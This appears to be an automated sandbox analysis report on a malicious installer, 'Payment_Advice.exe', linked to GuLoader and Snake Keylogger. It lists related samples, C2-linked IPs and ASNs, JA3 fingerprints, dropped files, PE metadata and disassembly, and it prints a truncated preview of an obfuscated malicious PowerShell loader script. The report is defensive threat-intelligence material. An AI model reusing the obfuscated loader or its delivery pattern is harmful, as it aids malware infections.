	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse	108.167.181.251
	Apixaban _August 2024.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Confirmation transfer AGS # 22-00379.exe	Get hash	malicious	FormBook, GuLoader	Browse	108.167.181.251
api.telegram.org	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Install.msi	Get hash	malicious	Unknown	Browse	149.154.167.220
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	z23RevisedInvoice.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Lisect_AVT_24003_G1B_67.exe	Get hash	malicious	Unknown	Browse	158.101.28.51
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Confirmation transfer Note AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	counter.exe	Get hash	malicious	Bdaejec	Browse	158.101.87.161
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
TELEGRAMRU	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	149.154.167.99
	LisectAVT_2403002C_60.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	LisectAVT_2403002C_67.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	LisectAVT_2403002C_81.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	CraxsRat VIP.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
CLOUDFLARENETUS	HSBC_PAYMENT.exe	Get hash	malicious	Azorult, GuLoader	Browse	172.67.162.36
	HSBC_PAYMENT.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.97.3
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.97.3
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse	188.114.97.3
	Apixaban _August 2024.exe	Get hash	malicious	Azorult, GuLoader	Browse	104.21.10.25
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.97.3
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.96.3
UNIFIEDLAYER-AS-1US	HSBC_PAYMENT.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	HSBC_PAYMENT.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse	108.167.181.251
	Apixaban _August 2024.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Confirmation transfer AGS # 22-00379.exe	Get hash	malicious	FormBook, GuLoader	Browse	108.167.181.251

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Lisect_AVT_24003_G1B_21.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Lisect_AVT_24003_G1B_21.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Lisect_AVT_24003_G1B_127.exe	Get hash	malicious	PureLog Stealer	Browse	188.114.97.3
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	LisectAVT_2403002C_15.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	LisectAVT_2403002C_16.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	jRlq1fSUW5.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Q2XwE8NRLx.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	Lisect_AVT_24003_G1A_33.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_84.msi	Get hash	malicious	AteraAgent	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	PO#86637.exe	Get hash	malicious	GuLoader	Browse	108.167.181.251
	HSBC_PAYMENT.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	HSBC_PAYMENT.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse	108.167.181.251
	Apixaban _August 2024.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lci5lel0.4m2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uskty4tf.nv4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afsbende.Tid

Download File

Process:	C:\Users\user\Desktop\Payment_Advice.exe
File Type:	data
Category:	dropped
Size (bytes):	342880
Entropy (8bit):	7.621992520512463
Encrypted:	false
SSDEEP:	6144:xNMIpFp0dqWqztLYt+jFnr1LDDJQFdpCWy7YjZCaZNgjxzSjTs8sb:xNMIZ0dBEYgFFKi7YjnNAwsBb
MD5:	12625DFA4EE6690F4A9C05BB465DAB0C
SHA1:	D41E034870F9AF4DB5DA3D78669428A116DD55D5
SHA-256:	E22568BD75588ABCCA0AAF3D937F91C3CA126AEF5AA96950F54DEC5C2130AB1F
SHA-512:	FC552C0836E0A16894B94AD193909562E8690339B036F2838AEAC3C1109C47C6041193EAC295ABCCD6AA0ED4D4D402A9D35DF40D91DEAC9FD4D3C672415AC0F8
Malicious:	false
Reputation:	low
Preview:	...................CC.......ee............4.........___.III.:.......w.//..tt..+........x......SS....7.....................h...i................--.......).]]..\|.?.\|........................##......BB..................W.f.oo.......................@..D..............Z.a....>................"..............HHH."........R..........................vv.............xxxx.uu...................0.....O.... ...q.......qqq........FFFFFF......S...z.y.WWWWW..l................K...............................l....................................................vvv.=====.k...............xxx...........[[[.a..{........S.......8................;.............$$$.DD...........0.....fff...e...............""........!..................................pppp..........i................\|\|....))..............`...................t......................VVV.++.....4......mm......nnn.-......GG..........................TT.....................d......9.!....x..................................\|\|..NNN.....T.>>.....g...............

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys

Download File

Process:	C:\Users\user\Desktop\Payment_Advice.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	71211
Entropy (8bit):	5.209977668057708
Encrypted:	false
SSDEEP:	1536:tbE4+KSDsn9LtOgiPuZKA94bnK5030xHU6htwZ:oKW6tOAKA9uK54g0+ty
MD5:	DDADA668A3A27B1117405F354F67D5F5
SHA1:	4764CC0A147B040E841EC0E5BEB08677FDE548A4
SHA-256:	19811EDDB00C1EFE0245FAC462A008519129EE55D89EA3DC5B2E234B7F79709D
SHA-512:	8087BB023E312216FB50DF228F775F24A66FCF5F6453495236195B0DB6AB1A5E81839890E33D4F9D5EA181C9A826D66296CB67C43C178F15D2888036F1FAB2A0
Malicious:	true
Reputation:	low
Preview:	$Plejede109=$nitchie;<#Attingence cylindren Meteas Blksprutternes Uudryddelige Viljesakt Sforhrene #><#Interjangle Prinsers Cathood Sackcloths Afbrydelsernes Brazilwood #><#Drapes Botilde Oblocution #><#Programafbrydning Collyrie Gdningsspreder Underinddel Revaccinations Udjvnede #><#Curler Abusedly nonglare chain #><#Worser Procenternes Skibsprovianteringshandler Semifurnished Farmsteads #>$Aculeus = "Romboid; Go,ter`$t onernLPaakenduDippedugbanansteRetardanEight,fdCanoniceRichard=Efterra`$SlyestpLNicoliniBronkost NedgretNeddyknePentagrr FundulaLamperneRrdr mmrUntainte Po.age1Ver ens;Rip,ermFSphen,duKompostnSporadocLikenedtOdg,rtriStavbaao SkulptnNeaterf Autoin,HSkylleniTercesagDinarchhKnokl.nludviklioUnshackwBeredvi Mythogr(Udtagsf`$DoctrinRForgre,aK.avsped AfblaniFilingeodisgospl TroejeiDivorcecTiterateS,entornUdlydensEmplaneePlucklerImiteras .iddel,Ambiti. Cym,bot`$SlidernIGraaligmSuff.remUnregenuPhysicon PostpoiDiamondsBanedeneSprat lrFremmediUnhallon SolidigHouseboeUnderdor Kaste

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	867992
Entropy (8bit):	7.615183082702222
Encrypted:	false
SSDEEP:	24576:HYDoeMwkejuoLD0tbQu9CWjoAjd4O3WQ:4dMErLkQu8Wj7d4GH
MD5:	0347F8C12B5BB537BDBECA759B4C67F4
SHA1:	DB7617A367383CDE0AE94564F5B2484692554A88
SHA-256:	E67C6018E32D7E2F598CF535FB6977C012CFA4FBA14A21B4884ADF405D3FAEB0
SHA-512:	D4030E61D3D6AFA1E2A2485EC01CCC6D78377EAE45AEE893C60BEAE05AAED5DC75F7A178CE1C59F245D3FF24DBD72361CF243E6660219130A89886DC8B9BB4D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@.................................{R.......................................t...........Y...........&...............................................................p...............................text...f^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc....Y.......Z...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\lokalplanrammes.sus

Download File

Process:	C:\Users\user\Desktop\Payment_Advice.exe
File Type:	data
Category:	dropped
Size (bytes):	221081
Entropy (8bit):	1.2406328235167285
Encrypted:	false
SSDEEP:	768:+sNmrp+QYzgwtqzOh8mcMPPy14oMvFzm8w/Y8vnLXWY8UBiBXVO3FzxrFUHItn4x:Y9A/S50ytu8voKwH
MD5:	D0A61E12A7A27A4B719AB0C4B9F57B88
SHA1:	55A349C760BA7AF05C54934924E2C0289BB3FF24
SHA-256:	243221C7BE40D55E82FDF162332959F85DF94CAF3EC8BC550EEE0DE0FC814A64
SHA-512:	3F117A4C26DDC7200AF9A79E8965F4396D175B368FF372BC7210929B15BA43B56EF68C6870F914638EC49ADF18CB553DF4492F583485ECC954C0238CC1405670
Malicious:	false
Preview:	.....................I...............................................\..................................Y.............................^...............................................................=..........e........................C....P................................`...............-.........................'.........................................................M.........................D....................[@..........................................H..........A...........................................d.........Lk.........................H.......n..............................................................................................C.........................4...v........................JU........&..................................................................]..... ....................................N..............................'.............................^.........................................................................k...............*...............

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\ondskabsfuldhedernes.txt

Download File

Process:	C:\Users\user\Desktop\Payment_Advice.exe
File Type:	ASCII text, with very long lines (367), with CRLF line terminators
Category:	dropped
Size (bytes):	440
Entropy (8bit):	4.2802377004664205
Encrypted:	false
SSDEEP:	12:QEUc9mHApTzMcC94e7q6hDwyK2Xkj9rKZaq:l9JTMp7AyKykBrk
MD5:	9524154CFD936F21394F74D000856732
SHA1:	3A45FE1B1EAAE9A1CAF11CA59FEBA1B3DE8E0CA3
SHA-256:	8EE6AE6BD6F5AF379B359A0CDD7721AEAEE0989C4B61431F2EAB1240FBBA56A2
SHA-512:	4DA2F73D1D6F027B9C939785F63D6F75477F978AB7F8532D8395D5C5C346397E1E4B090CC815AA5F75E2629F81C1FD64B7246266331DBB26D3B0075CE4579250
Malicious:	false
Preview:	habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious deklinationen armiferous bryggerkar totaktsmotorernes ombudsmandsudtalelsers overtinsel metronidazole uldspind..unmortifiedness ildspaasttelserne plagiostomata klauss ryaerne carline,

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl

Download File

Process:	C:\Users\user\Desktop\Payment_Advice.exe
File Type:	data
Category:	dropped
Size (bytes):	629448
Entropy (8bit):	1.257234589035216
Encrypted:	false
SSDEEP:	1536:LD3CLXCvTm3+3JOgkFWZfcDkZLwWIE4pzswWg95LDsRgtlVkIRh:X3US6uZOgk2fcJl5FWy5LDEQlK0
MD5:	B9E5947712FA407B58A8527B52CE050E
SHA1:	9FD16F2F3569FF478C591E16A03EF65F7D63E57E
SHA-256:	30B60EB19A5E7A32DAB61A17C1BCA485D8040EE9488024AA031C0190A7DCB510
SHA-512:	BBCF1AC518547982928276E01EA61C26600A426EBD57928A82801F5ACBD8E2047359AC1CB41DEB0898CFB5D10BAA419C782C910830517C3F44F555963D6EEB9D
Malicious:	false
Preview:	....,......................................................................k............\..................................J.................................................}.......................R....................... ........k...........$.....................................................'............ ...............................I....................2................=.................................................................................................................d.................................................................g..............................................X.....................j............................................................................4....mJ..T...Z......................... ..................Y......Z.......................................U.............L....u..S......................................................U.................................U..................................................e.........................

C:\Users\user\AppData\Local\Temp\nspC30E.tmp

Download File

Process:	C:\Users\user\Desktop\Payment_Advice.exe
File Type:	data
Category:	dropped
Size (bytes):	1274434
Entropy (8bit):	3.8860922782055214
Encrypted:	false
SSDEEP:	12288:ONMIZ0dBEYgFFKi7YjnNAwsB7sYNh5Cact5v:OB0dKVFf6nNAH7sYL4v
MD5:	8B6CF5DF508BD086A5F7790ECDF9AF90
SHA1:	E5B4C15D4C70C2BC59AF83EED045762C0CFD2BB0
SHA-256:	25865ACA03696B44E8A9E9A1F731E2DC444F2B45CE0BED0CA5106B1BBDEA5363
SHA-512:	50D0616C8CAD961B33D435D28891A35455D0D11FA276C9C66DB723A9E25E32802C94797B24BA7A26CBAD385DA86F77146A1EB88D0B87CAE8792B9F2589ABB622
Malicious:	false
Preview:	.$......,...................U............#.......$........................................................................................................................................................................................................................................G...f...........I...j...............................................................................................................................v...............4.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.615183082702222
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment_Advice.exe
File size:	867'992 bytes
MD5:	0347f8c12b5bb537bdbeca759b4c67f4
SHA1:	db7617a367383cde0ae94564f5b2484692554a88
SHA256:	e67c6018e32d7e2f598cf535fb6977c012cfa4fba14a21b4884adf405d3faeb0
SHA512:	d4030e61d3d6afa1e2a2485ec01ccc6d78377eae45aee893c60beae05aaed5dc75f7a178ce1c59f245d3ff24dbd72361cf243e6660219130a89886dc8b9bb4d4
SSDEEP:	24576:HYDoeMwkejuoLD0tbQu9CWjoAjd4O3WQ:4dMErLkQu8Wj7d4GH
TLSH:	80051250B2A2EA91C8190D351517C7809F76DD242E22DAEB3758BBAFDF776C12E06307
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@

File Icon


Icon Hash:	293cc0c898b02800

Static PE Info

General

Entrypoint:	0x403358
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e221f4f7d36469d53810a4b5f9fc8966

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Playacts Sigyn Pulsidge ", O=Archeolithic, L=Pontsticill, S=Wales, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	10/03/2024 10:14:42 10/03/2027 10:14:42
Subject Chain	CN="Playacts Sigyn Pulsidge ", O=Archeolithic, L=Pontsticill, S=Wales, C=GB
Version:	3
Thumbprint MD5:	F8E6D9BB0A6F3C2E2BE4A68AC293C669
Thumbprint SHA-1:	68F59A7B64E34326B2AFC9A9C7B98FEE641F738D
Thumbprint SHA-256:	885F1A29206DB44D6D0529B1472402AA085FC54163F5B24E5A299D9C052C9549
Serial:	225AEDCB849B388D791419732309B2FD643B8A10

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000008h
mov dword ptr [00429298h], eax
call 00007F5FD0862B7Ch
mov dword ptr [004291E4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00420690h
call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007F5FD08627E7h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007F5FD08627D5h
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007F5FD085FCCAh
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007F5FD0862226h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007F5FD085FD8Eh
push 00000020h
pop edx
cmp cx, dx
jne 00007F5FD085FCC9h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007F5FD085FCBBh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7494	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x48000	0x55918	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd26e8	0x17b0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	e8f12472e91b02deb619070e6ee7f1f4	False	0.6566569010416666	data	6.419409887460116	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	2222fe44ebbadbc32af32dfc9c88e48e	False	0.4306640625	data	5.037511188789184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202d8	0x600	a5ec1b720d350c6303a7aba8d85072bf	False	0.4733072916666667	data	3.7600484096214832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x1e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x48000	0x55918	0x55a00	3d6a8b72f49b497aa2f6e828f36e2071	False	0.6818487682481752	data	6.750089044557724	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x486e8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.48516798769667574
RT_ICON	0x58f10	0x104d3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004043671653862
RT_ICON	0x693e8	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5461162497372294
RT_ICON	0x72890	0x6b94	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.995279593318809
